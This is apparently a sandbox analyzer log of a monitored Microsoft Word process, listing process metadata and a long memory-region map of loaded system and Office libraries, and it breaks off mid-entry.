# Flog Txt Version 1 # Analyzer Version: 2.2.0 # Analyzer Build Date: Dec 15 2017 17:49:06 # Log Creation Date: 20.12.2017 14:26:29.564 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files\\microsoft office\\office15\\winword.exe" page_root = "0x7f1e6740" os_pid = "0x95c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE\"" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f46e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 136 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 137 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 138 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 139 start_va = 0x40000 end_va = 0x43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 140 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 141 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 142 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 143 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 144 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 145 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 146 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 147 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 148 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 149 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 150 start_va = 0x3f0000 end_va = 0x420fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 151 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 152 start_va = 0x440000 end_va = 0x441fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 153 start_va = 0x450000 end_va = 0x459fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 154 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 155 start_va = 0x470000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 156 start_va = 0x4b0000 end_va = 0x4b6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 157 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 158 start_va = 0x4d0000 end_va = 0x4d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 159 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 160 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 161 start_va = 0x610000 end_va = 0x6eefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 162 start_va = 0x6f0000 end_va = 0x6f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 163 start_va = 0x700000 end_va = 0x700fff entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 164 start_va = 0x720000 end_va = 0x720fff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 165 start_va = 0x740000 end_va = 0x740fff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 166 start_va = 0x760000 end_va = 0x760fff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 167 start_va = 0x770000 end_va = 0x78ffff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 168 start_va = 0x790000 end_va = 0x88ffff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 169 start_va = 0x890000 end_va = 0x890fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 170 start_va = 0x8a0000 end_va = 0x8a0fff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 171 start_va = 0x8b0000 end_va = 0x8b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 172 start_va = 0x8c0000 end_va = 0x8c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 173 start_va = 0x8d0000 end_va = 0x9cffff entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 174 start_va = 0x9d0000 end_va = 0xdc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 175 start_va = 0xdd0000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 176 start_va = 0xee0000 end_va = 0xee0fff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 177 start_va = 0xf00000 end_va = 0xf00fff entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 178 start_va = 0xf20000 end_va = 0xf20fff entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 179 start_va = 0xf40000 end_va = 0xf40fff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 180 start_va = 0xf50000 end_va = 0xf50fff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 181 start_va = 0xf60000 end_va = 0xf61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f60000" filename = "" Region: id = 182 start_va = 0xf70000 end_va = 0xf70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 183 start_va = 0xf80000 end_va = 0x1156fff entry_point = 0xf80000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE" (normalized: "c:\\program files\\microsoft office\\office15\\winword.exe") Region: id = 184 start_va = 0x1160000 end_va = 0x1d5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 185 start_va = 0x1d60000 end_va = 0x202efff entry_point = 0x1d60000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 186 start_va = 0x2030000 end_va = 0x20affff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 187 start_va = 0x20b0000 end_va = 0x20effff entry_point = 0x0 region_type = private name = "private_0x00000000020b0000" filename = "" Region: id = 188 start_va = 0x20f0000 end_va = 0x20f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000020f0000" filename = "" Region: id = 189 start_va = 0x2100000 end_va = 0x2100fff entry_point = 0x2100000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 190 start_va = 0x2110000 end_va = 0x2110fff entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 191 start_va = 0x2130000 end_va = 0x2130fff entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 192 start_va = 0x2150000 end_va = 0x2150fff entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 193 start_va = 0x2170000 end_va = 0x2170fff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 194 start_va = 0x21b0000 end_va = 0x21b0fff entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 195 start_va = 0x21e0000 end_va = 0x21e0fff entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 196 start_va = 0x2210000 end_va = 0x2234fff entry_point = 0x2210000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db") Region: id = 197 start_va = 0x2240000 end_va = 0x2240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 198 start_va = 0x2250000 end_va = 0x2260fff entry_point = 0x2250000 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 199 start_va = 0x2290000 end_va = 0x238ffff entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 200 start_va = 0x23b0000 end_va = 0x23cefff entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 201 start_va = 0x23d0000 end_va = 0x24cffff entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 202 start_va = 0x24d0000 end_va = 0x24d0fff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 203 start_va = 0x24e0000 end_va = 0x24e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024e0000" filename = "" Region: id = 204 start_va = 0x24f0000 end_va = 0x25effff entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 205 start_va = 0x25f0000 end_va = 0x266efff entry_point = 0x25f0000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 206 start_va = 0x26a0000 end_va = 0x26dffff entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 207 start_va = 0x26e0000 end_va = 0x2adffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026e0000" filename = "" Region: id = 208 start_va = 0x2ae0000 end_va = 0x340ffff entry_point = 0x2ae0000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 209 start_va = 0x3410000 end_va = 0x350ffff entry_point = 0x0 region_type = private name = "private_0x0000000003410000" filename = "" Region: id = 210 start_va = 0x3530000 end_va = 0x356ffff entry_point = 0x0 region_type = private name = "private_0x0000000003530000" filename = "" Region: id = 211 start_va = 0x35d0000 end_va = 0x35dffff entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 212 start_va = 0x35e0000 end_va = 0x36dffff entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 213 start_va = 0x3740000 end_va = 0x374ffff entry_point = 0x0 region_type = private name = "private_0x0000000003740000" filename = "" Region: id = 214 start_va = 0x3790000 end_va = 0x379ffff entry_point = 0x0 region_type = private name = "private_0x0000000003790000" filename = "" Region: id = 215 start_va = 0x37a0000 end_va = 0x3803fff entry_point = 0x37a0000 region_type = mapped_file name = "seguisb.ttf" filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf") Region: id = 216 start_va = 0x3850000 end_va = 0x394ffff entry_point = 0x0 region_type = private name = "private_0x0000000003850000" filename = "" Region: id = 217 start_va = 0x3990000 end_va = 0x399ffff entry_point = 0x0 region_type = private name = "private_0x0000000003990000" filename = "" Region: id = 218 start_va = 0x39a0000 end_va = 0x419ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000039a0000" filename = "" Region: id = 219 start_va = 0x41b0000 end_va = 0x42affff entry_point = 0x0 region_type = private name = "private_0x00000000041b0000" filename = "" Region: id = 220 start_va = 0x42b0000 end_va = 0x436ffff entry_point = 0x42b0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 221 start_va = 0x43d0000 end_va = 0x44cffff entry_point = 0x0 region_type = private name = "private_0x00000000043d0000" filename = "" Region: id = 222 start_va = 0x4540000 end_va = 0x463ffff entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 223 start_va = 0x4690000 end_va = 0x478ffff entry_point = 0x0 region_type = private name = "private_0x0000000004690000" filename = "" Region: id = 224 start_va = 0x4790000 end_va = 0x4b8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004790000" filename = "" Region: id = 225 start_va = 0x4cc0000 end_va = 0x4cfffff entry_point = 0x0 region_type = private name = "private_0x0000000004cc0000" filename = "" Region: id = 226 start_va = 0x4e70000 end_va = 0x4eaffff entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 227 start_va = 0x50a0000 end_va = 0x50dffff entry_point = 0x0 region_type = private name = "private_0x00000000050a0000" filename = "" Region: id = 228 start_va = 0x50e0000 end_va = 0x54dffff entry_point = 0x0 region_type = private name = "private_0x00000000050e0000" filename = "" Region: id = 229 start_va = 0x54e0000 end_va = 0x56dffff entry_point = 0x0 region_type = private name = "private_0x00000000054e0000" filename = "" Region: id = 230 start_va = 0x56e0000 end_va = 0x5adffff entry_point = 0x0 region_type = private name = "private_0x00000000056e0000" filename = "" Region: id = 231 start_va = 0x5ae0000 end_va = 0x62dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005ae0000" filename = "" Region: id = 232 start_va = 0x62e0000 end_va = 0x66e0fff entry_point = 0x0 region_type = private name = "private_0x00000000062e0000" filename = "" Region: id = 233 start_va = 0x66f0000 end_va = 0x6af0fff entry_point = 0x0 region_type = private name = "private_0x00000000066f0000" filename = "" Region: id = 234 start_va = 0x6b00000 end_va = 0x6f00fff entry_point = 0x0 region_type = private name = "private_0x0000000006b00000" filename = "" Region: id = 235 start_va = 0x6f10000 end_va = 0x710ffff entry_point = 0x0 region_type = private name = "private_0x0000000006f10000" filename = "" Region: id = 236 start_va = 0x7110000 end_va = 0x75cffff entry_point = 0x0 region_type = private name = "private_0x0000000007110000" filename = "" Region: id = 237 start_va = 0x75d0000 end_va = 0x79cffff entry_point = 0x0 region_type = private name = "private_0x00000000075d0000" filename = "" Region: id = 238 start_va = 0x79d0000 end_va = 0x81cffff entry_point = 0x0 region_type = private name = "private_0x00000000079d0000" filename = "" Region: id = 239 start_va = 0x36620000 end_va = 0x3662ffff entry_point = 0x0 region_type = private name = "private_0x0000000036620000" filename = "" Region: id = 240 start_va = 0x63a10000 end_va = 0x63b9dfff entry_point = 0x63a10000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\riched20.dll") Region: id = 241 start_va = 0x63ba0000 end_va = 0x63c54fff entry_point = 0x63ba0000 region_type = mapped_file name = "adal.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\ADAL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\adal.dll") Region: id = 242 start_va = 0x63c60000 end_va = 0x63cd9fff entry_point = 0x63c60000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 243 start_va = 0x63db0000 end_va = 0x63eb9fff entry_point = 0x63db0000 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 244 start_va = 0x63ec0000 end_va = 0x63febfff entry_point = 0x63ec0000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 245 start_va = 0x63ff0000 end_va = 0x68cdafff entry_point = 0x63ff0000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\msores.dll") Region: id = 246 start_va = 0x68ce0000 end_va = 0x6a5c3fff entry_point = 0x68ce0000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\mso.dll") Region: id = 247 start_va = 0x6a5d0000 end_va = 0x6ba8bfff entry_point = 0x6a5d0000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\WWLIB.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\wwlib.dll") Region: id = 248 start_va = 0x6baf0000 end_va = 0x6bb72fff entry_point = 0x6baf0000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 249 start_va = 0x6bb80000 end_va = 0x6bc95fff entry_point = 0x6bb80000 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSPTLS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\msptls.dll") Region: id = 250 start_va = 0x6bca0000 end_va = 0x6c010fff entry_point = 0x6bca0000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\1033\\msointl.dll") Region: id = 251 start_va = 0x6c020000 end_va = 0x6c0dffff entry_point = 0x6c020000 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\1033\\WWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\1033\\wwintl.dll") Region: id = 252 start_va = 0x6c0e0000 end_va = 0x6c199fff entry_point = 0x6c0e0000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 253 start_va = 0x6c1a0000 end_va = 0x6cf47fff entry_point = 0x6c1a0000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\oart.dll") Region: id = 254 start_va = 0x6e980000 end_va = 0x6e9c9fff entry_point = 0x6e980000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 255 start_va = 0x6eed0000 end_va = 0x6ef20fff entry_point = 0x6eed0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 256 start_va = 0x6f220000 end_va = 0x6f24cfff entry_point = 0x6f220000 region_type = mapped_file name = "osppc.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll") Region: id = 257 start_va = 0x6f2f0000 end_va = 0x6f304fff entry_point = 0x6f2f0000 region_type = mapped_file name = "msohev.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\MSOHEV.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\msohev.dll") Region: id = 258 start_va = 0x6fc30000 end_va = 0x6fd87fff entry_point = 0x6fc30000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 259 start_va = 0x707d0000 end_va = 0x70ccffff entry_point = 0x707d0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\cultures\\office.odf") Region: id = 260 start_va = 0x70cd0000 end_va = 0x70f0ffff entry_point = 0x70cd0000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 261 start_va = 0x70f40000 end_va = 0x70fa8fff entry_point = 0x70f40000 region_type = mapped_file name = "msvcp100.dll" filename = "\\Windows\\System32\\msvcp100.dll" (normalized: "c:\\windows\\system32\\msvcp100.dll") Region: id = 262 start_va = 0x70fb0000 end_va = 0x7106efff entry_point = 0x70fb0000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\System32\\msvcr100.dll" (normalized: "c:\\windows\\system32\\msvcr100.dll") Region: id = 263 start_va = 0x713e0000 end_va = 0x71462fff entry_point = 0x713e0000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 264 start_va = 0x71470000 end_va = 0x714a9fff entry_point = 0x71470000 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 265 start_va = 0x714b0000 end_va = 0x714dbfff entry_point = 0x714b0000 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 266 start_va = 0x716a0000 end_va = 0x716eefff entry_point = 0x716a0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 267 start_va = 0x716f0000 end_va = 0x71747fff entry_point = 0x716f0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 268 start_va = 0x71b10000 end_va = 0x71b14fff entry_point = 0x71b10000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 269 start_va = 0x737f0000 end_va = 0x73810fff entry_point = 0x737f0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 270 start_va = 0x73a80000 end_va = 0x73a8cfff entry_point = 0x73a80000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 271 start_va = 0x73aa0000 end_va = 0x73b9afff entry_point = 0x73aa0000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 272 start_va = 0x73bd0000 end_va = 0x73be2fff entry_point = 0x73bd0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 273 start_va = 0x73d70000 end_va = 0x73efffff entry_point = 0x73d70000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 274 start_va = 0x73f00000 end_va = 0x73f3ffff entry_point = 0x73f00000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 275 start_va = 0x73f40000 end_va = 0x74034fff entry_point = 0x73f40000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 276 start_va = 0x74080000 end_va = 0x7421dfff entry_point = 0x74080000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 277 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 278 start_va = 0x74910000 end_va = 0x7494afff entry_point = 0x74910000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 279 start_va = 0x74b70000 end_va = 0x74b85fff entry_point = 0x74b70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 280 start_va = 0x74fb0000 end_va = 0x74fb7fff entry_point = 0x74fb0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 281 start_va = 0x74fd0000 end_va = 0x74feafff entry_point = 0x74fd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 282 start_va = 0x74ff0000 end_va = 0x74ffbfff entry_point = 0x74ff0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 283 start_va = 0x75060000 end_va = 0x75088fff entry_point = 0x75060000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 284 start_va = 0x75090000 end_va = 0x7509dfff entry_point = 0x75090000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 285 start_va = 0x750a0000 end_va = 0x750aafff entry_point = 0x750a0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 286 start_va = 0x75110000 end_va = 0x7511bfff entry_point = 0x75110000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 287 start_va = 0x75120000 end_va = 0x7523cfff entry_point = 0x75120000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 288 start_va = 0x75240000 end_va = 0x75251fff entry_point = 0x75240000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 289 start_va = 0x75260000 end_va = 0x752a9fff entry_point = 0x75260000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 290 start_va = 0x75340000 end_va = 0x7536cfff entry_point = 0x75340000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 291 start_va = 0x75370000 end_va = 0x75396fff entry_point = 0x75370000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 292 start_va = 0x75420000 end_va = 0x754c0fff entry_point = 0x75420000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: 